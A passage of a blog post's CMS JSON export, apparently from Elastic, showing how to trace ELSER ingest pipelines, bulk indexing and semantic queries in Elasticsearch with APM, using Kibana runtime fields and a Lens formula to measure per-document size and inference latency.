happening when we create an index. We have the create call, we need to publish it to the cluster state and start the shard.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1b2d3b923c429ef7"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt90d953314a6f99ad","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:21:37.590Z","created_by":"bltb6c155cd84fc0c1a","file_size":"288053","filename":"elastic-blog-1-trace-sample.png","parent_uid":null,"tags":[],"title":"elastic-blog-1-trace-sample.png","updated_at":"2023-08-09T15:21:37.590Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.057Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt90d953314a6f99ad/64d3af01759deec847e00c1f/elastic-blog-1-trace-sample.png"},"_metadata":{"uid":"csf71e3d3abb78fe98"},"caption_l10n":"","alt_text_l10n":"trace sample","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9a10a57c4616a898"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe next thing we need to do is create an ingest pipeline — we call it \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eopenwebtext\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The pipeline name must be referenced in the index creation call above since we are setting it as the default pipeline. This ensures that every document sent against the index will automatically run through this pipeline if no other pipeline is specified in the request.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs87407b5fdb0b9e28"}}},{"code":{"code":"PUT _ingest/pipeline/openwebtext\n{\n \"description\": \"Elser\",\n \"processors\": [\n {\n \"inference\": {\n \"model_id\": \".elser_model_1\",\n \"target_field\": \"ml\",\n \"field_map\": {\n \"text\": \"text_field\"\n },\n \"inference_config\": {\n \"text_expansion\": {\n \"results_field\": \"tokens\"\n }\n }\n }\n }\n ]\n}","_metadata":{"uid":"csfd6ebae1fc26e713"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd6b7eb0fe060f070"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe get a \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ePUT /_ingest/pipeline/{id}\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e transaction. We see the cluster state update and some internal calls. With this, all the preparation is done, and we can start running the bulk indexing with the openwebtext data set.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd16a96c79e1d82d3"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt120cf85d4a8ea142","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:21:52.204Z","created_by":"bltb6c155cd84fc0c1a","file_size":"351545","filename":"elastic-blog-2-timeline-view.png","parent_uid":null,"tags":[],"title":"elastic-blog-2-timeline-view.png","updated_at":"2023-08-09T15:21:52.204Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.073Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt120cf85d4a8ea142/64d3af100a8e993ff40e8ac8/elastic-blog-2-timeline-view.png"},"_metadata":{"uid":"csf2caf3e579f40ee0"},"caption_l10n":"","alt_text_l10n":"timeline view","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaab6ebf16b4ec8a6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBefore we start the bulk ingest, we need to start the ELSER model. Go to Machine Learning, Trained Models, and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eplay\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Here you can choose the number of allocations and threads.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe model starts is captured as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePOST /_ml/trained_models/{model_id}/deployment/_start\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. It contains some internal calls and might be less interesting than the other transactions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs78af9c0d5e9adc77"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"bltb4d674e87e89f29f","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:22:04.015Z","created_by":"bltb6c155cd84fc0c1a","file_size":"175365","filename":"elastic-blog-3-tracesample2.png","parent_uid":null,"tags":[],"title":"elastic-blog-3-tracesample2.png","updated_at":"2023-08-09T15:22:04.015Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.057Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb4d674e87e89f29f/64d3af1c7c819b125770c4b0/elastic-blog-3-tracesample2.png"},"_metadata":{"uid":"cs88f617c159e29d2a"},"caption_l10n":"","alt_text_l10n":"trace sample 2","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8a27de04685929e9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, we want to verify that everything works by running the following. Kibana Dev Tools have a cool little trick, you can use triple quotes, as in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e”””\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e at the start and the end of a text, to tell Kibana\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to treat it as a string and escape if necessary. No more manual escaping of JSONs or dealing with line breaks. Just drop in your text. This should return a text and a ml.tokens field showing all the tokens.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8d325cf6fc1f6d31"}}},{"code":{"code":"POST _ingest/pipeline/openwebtext/_simulate\n{\n \"docs\": [\n {\n \"_source\": {\n \"text\": \"\"\"This is a sample text\"\"\"\n }\n }\n ]\n}","_metadata":{"uid":"cs765422fd8d6aa7fd"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1531454d5ba95337"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis call is also captured as a transaction \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePOST _ingest/pipeline/{id}/_simulate\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The interesting thing here is we see that the inference call took 338ms. This is the time needed by the model to create the vectors.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs932d6a3b01d7b164"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt00098ddb92150285","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:22:16.552Z","created_by":"bltb6c155cd84fc0c1a","file_size":"223601","filename":"elastic-blog-4-timeline-type.png","parent_uid":null,"tags":[],"title":"elastic-blog-4-timeline-type.png","updated_at":"2023-08-09T15:22:16.552Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.082Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt00098ddb92150285/64d3af28d94c62772d4be78d/elastic-blog-4-timeline-type.png"},"_metadata":{"uid":"cs1e68ed68ba38b90c"},"caption_l10n":"","alt_text_l10n":"timeline type","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Bulk ingest","_metadata":{"uid":"cs9ea08edbacff572a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe openwebtext data set has a single text file representing a single document in Elasticsearch. This rather hack-ish Python code reads all the files and sends them to Elasticsearch using the simple bulk helper. Note that you would not want to use this in production, as it is relatively slow since it runs in serialization. We have parallel bulk helpers allowing you to run multiple bulk requests at a time.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa56b31a0ca625ac6"}}},{"code":{"code":"import os\nfrom elasticsearch import Elasticsearch, helpers\n\n# Elasticsearch connection settings\nES_HOST = 'https://localhost:9200' # Replace with your Elasticsearch host\nES_INDEX = 'openwebtext-analyzed' # Replace with the desired Elasticsearch index name\n\n# Path to the folder containing your text files\nTEXT_FILES_FOLDER = 'openwebtext'\n\n# Elasticsearch client\nes = Elasticsearch(hosts=ES_HOST, basic_auth=('elastic', 'password'))\n\ndef read_text_files(folder_path):\n for root, _, files in os.walk(folder_path):\n for filename in files:\n if filename.endswith('.txt'):\n file_path = os.path.join(root, filename)\n with open(file_path, 'r', encoding='utf-8') as file:\n content = file.read()\n yield {\n '_index': ES_INDEX,\n '_source': {\n 'text': content,\n }\n }\n\ndef index_to_elasticsearch():\n try:\n helpers.bulk(es, read_text_files(TEXT_FILES_FOLDER), chunk_size=25)\n print(\"Indexing to Elasticsearch completed successfully.\")\n except Exception as e:\n print(f\"Error occurred while indexing to Elasticsearch: {e}\")\n\nif __name__ == \"__main__\":\n index_to_elasticsearch()","_metadata":{"uid":"csaafce9a31b446df7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs553088a499bab3b5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat is key information is that we are using a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003echunk_size\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of 25, meaning that we are sending 25 documents in a single bulk request. Let’s start this Python script. The Python \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ehelpers.bulk\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e send a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePUT /_bulk\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e request. We can see the transaction. Every transaction represents a single bulk that contains 25 documents.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9460b9e3675de343"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt1291cd0d901e0daa","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:22:30.420Z","created_by":"bltb6c155cd84fc0c1a","file_size":"161504","filename":"elastic-blog-5-key-info.png","parent_uid":null,"tags":[],"title":"elastic-blog-5-key-info.png","updated_at":"2023-08-09T15:22:30.420Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.080Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1291cd0d901e0daa/64d3af362c43eedb9a1d1598/elastic-blog-5-key-info.png"},"_metadata":{"uid":"cs3e6aa345680b1bb3"},"caption_l10n":"","alt_text_l10n":"key info","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc2352c284c9655ea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe see that these 25 documents took 11 seconds to be indexed. Every time the ingest pipeline calls the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003einference\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e processor — and therefore, the machine learning model — we see how long this particular processor takes. In this case, it’s roughly 500 milliseconds — 25 docs, each ~500 ms processing ~= 12,5 seconds. Generally speaking, this is an interesting view, as a longer document might impose a higher tax because there is more to analyze than a shorter one. Overall, the entire bulk request duration also includes the answer back to the Python agent with the ok for the indexing. Now, we can create a dashboard and calculate the average bulk request duration. We’ll do a little trick inside Lens to calculate the average time per doc. I’ll show you how.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFirst, there is an interesting metadata captured inside the transaction — the field is called \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elabels.http_request_headers_content_length\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. This field may be mapped as a keyword and therefore does not allow us to run mathematical operations like sum, average, and division. But thanks to runtime fields, we don’t mind that. We can just cast it as a Double. In Kibana, go to your data view that contains the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etraces-apm\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e data stream and do the following as a value:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9bee4d43156aebdf"}}},{"code":{"code":"emit(Double.parseDouble($('labels.http_request_headers_content_length','0.0')))","_metadata":{"uid":"cs011050272e1af50a"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc8e7d69e4746eebe"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis emits the existing value as a Double if that field is non-existent and/or missing, and it will report as 0.0. Furthermore, set the Format to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eBytes\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. This will make it automatically prettified! It should look like this:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0da91d98e6ef3cad"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt755d4f3893af1c0e","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:22:41.683Z","created_by":"bltb6c155cd84fc0c1a","file_size":"458242","filename":"elastic-blog-6-create-field.png","parent_uid":null,"tags":[],"title":"elastic-blog-6-create-field.png","updated_at":"2023-08-09T15:22:41.683Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.072Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt755d4f3893af1c0e/64d3af410bd73be8d9e91135/elastic-blog-6-create-field.png"},"_metadata":{"uid":"cs01fb6e04d232453b"},"caption_l10n":"","alt_text_l10n":"create field","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaf7edcfbe0c5b15d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCreate a new dashboard, and start with a new visualization. We want to select the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003emetric\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e visualization and use this KQL filter: \u003cspan data-type='inlineCode'\u003edata_stream.type: \"traces\" AND service.name: \"elasticsearch\" AND transaction.name: \"PUT /_bulk\"\u003c/span\u003e. In data view, select the one that includes \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003etraces-apm\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, basically the same as where we added the field from above. Click on \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eprimary metric\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eformula\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs836f8c97f8a0b235"}}},{"code":{"code":"sum(labels.http_request_headers_content_length_double)/(count()*25)","_metadata":{"uid":"cs0096e296a8528e4a"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs001997b51c6169f1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSince we know that every bulk request contains 25 documents, we can just multiply the count of records (number of transactions) by 25 and divide the total sum of bytes to identify how large a single document was. But there are a few caveats — first, a bulk request includes an overhead. A bulk looks like this:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc8fc2de3398ecd42"}}},{"code":{"code":"{ \"index\": { \"_index\": \"openwebtext\" }\n{ \"_source\": { \"text\": \"this is a sample\" } }","_metadata":{"uid":"cs27b10d0f93b4782f"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse096187d5ab8e5ad"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor every document you want to index, you get a second line in JSON that contributes to the overall size. More importantly, the second caveat is compression. When using any compression, we can only say “the documents in this bulk, where of size x” because the compression will work differently depending on the bulk content. When using a high compression value, we might end up with the same size when sending 500 documents compared to the 25 we do now. Nonetheless, it is an interesting metric.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs27a5997e9d566227"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt15b50b71c67d185e","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:23:01.590Z","created_by":"bltb6c155cd84fc0c1a","file_size":"210390","filename":"elastic-blog-7-metric.png","parent_uid":null,"tags":[],"title":"elastic-blog-7-metric.png","updated_at":"2023-08-09T15:23:01.590Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.042Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt15b50b71c67d185e/64d3af55455bf61148f9b9c4/elastic-blog-7-metric.png"},"_metadata":{"uid":"csa39df38bf0229f07"},"caption_l10n":"","alt_text_l10n":"metric","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5efd790a39b80bdc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe can use the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003etransaction.duration.us\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e tip! Change the format in the Kibana Data View to Duration and select microseconds, ensuring it’s rendered nicely. Quickly, we can see that, on average, the bulk request is ~125kb in size, ~5kb per doc, and 9.6 seconds, with 95% of all bulk requests finishing below 11.8 seconds.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs71187b57989184c7"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt228e7b3fe3203f10","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:23:11.427Z","created_by":"bltb6c155cd84fc0c1a","file_size":"53662","filename":"elastic-blog-8-avg-numbers.png","parent_uid":null,"tags":[],"title":"elastic-blog-8-avg-numbers.png","updated_at":"2023-08-09T15:23:11.427Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.073Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt228e7b3fe3203f10/64d3af5f4d5a848d298d5ee6/elastic-blog-8-avg-numbers.png"},"_metadata":{"uid":"cs5039c773b3c4d9df"},"caption_l10n":"","alt_text_l10n":"average numbers","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Query time!","_metadata":{"uid":"csb9905b28d34903f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, we have indexed many documents and are finally ready to query it. Let’s do the following query:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3c515d758c42fb5f"}}},{"code":{"code":"GET /openwebtext/_search\n{\n \"query\":{\n \"text_expansion\":{\n \"ml.tokens\":{\n \"model_id\":\".elser_model_1\",\n \"model_text\":\"How can I give my cat medication?\"\n }\n }\n }\n}","_metadata":{"uid":"csd9b9deb983db4b9e"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs880c4642c4b277e2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eI am asking the openwebtext data set on articles about feeding my cat medication. My REST client tells me that the entire search, from start to parsing the response, took: 94.4 milliseconds. The took statement inside the response is 91 milliseconds, meaning that the search took 91 milliseconds on Elasticsearch, excluding a few things. Let’s now look into our \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eGET /{index}/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e transaction.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs12cc8724d1d35e76"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt82e48c3940f880b8","ACL":{},"content_type":"image/png","created_at":"2023-08-09T15:23:24.657Z","created_by":"bltb6c155cd84fc0c1a","file_size":"176085","filename":"elastic-blog-9-openwebtext-dataset.png","parent_uid":null,"tags":[],"title":"elastic-blog-9-openwebtext-dataset.png","updated_at":"2023-08-09T15:23:24.657Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-10T14:00:00.078Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt82e48c3940f880b8/64d3af6cf06c9078eb537d5e/elastic-blog-9-openwebtext-dataset.png"},"_metadata":{"uid":"cs4860a17807f94b41"},"caption_l10n":"","alt_text_l10n":"openwebtext dataset","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf20a8b6878469614"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe can identify that the impact of the machine learning, basically creating the tokens on the fly, is 74 milliseconds out of the total request. Yes, this takes up roughly ¾ of the entire transaction duration. With this information, we can make informed decisions on how to scale the machine learning nodes to bring down the query time.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Conclusion","_metadata":{"uid":"cs64dd743b00d530de"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis blog post showed you how important it is to have Elasticsearch as an instrumented application and identify bottlenecks much more easily. Also, you can use the transaction duration as a metric for anomaly detection, do A/B testing for your application, and never wonder again if Elasticsearch feels faster now. You got data to back this up. Furthermore, this is extensively looking at the machine learning side of things. Checkout the general slow log query investigation \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/troubleshoot-slow-Elasticsearch-queries\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eblog post\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for more ideas.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe dashboard and data view can be imported from my \u003c/span\u003e\u003ca href=\"https://github.com/philippkahr/blogs/tree/main/apm-instrumentation-of-elastic-stack/mlops-elser\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGitHub repository.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7673527ef8e82bed"}}},{"callout":{"title_l10n":"Warning","_metadata":{"uid":"cs73072cb8c2e9a880"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere is an issue with the spans inside Elasticsearch. This is \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/pull/98113\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003efixed\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in the upcoming release of 8.9.1. Until then, the transactions use the wrong clock, which disturbs the overall duration.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc6a1942c182ec372"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs63bceb5caabd40c3"}}}],"publish_date":"2023-08-10","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltf4c040a3cb414ac0","ACL":{},"created_at":"2023-11-06T21:32:35.092Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"semantic-search","label_l10n":"Semantic search","tags":[],"title":"Semantic search","updated_at":"2023-11-06T21:32:35.092Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.425Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML 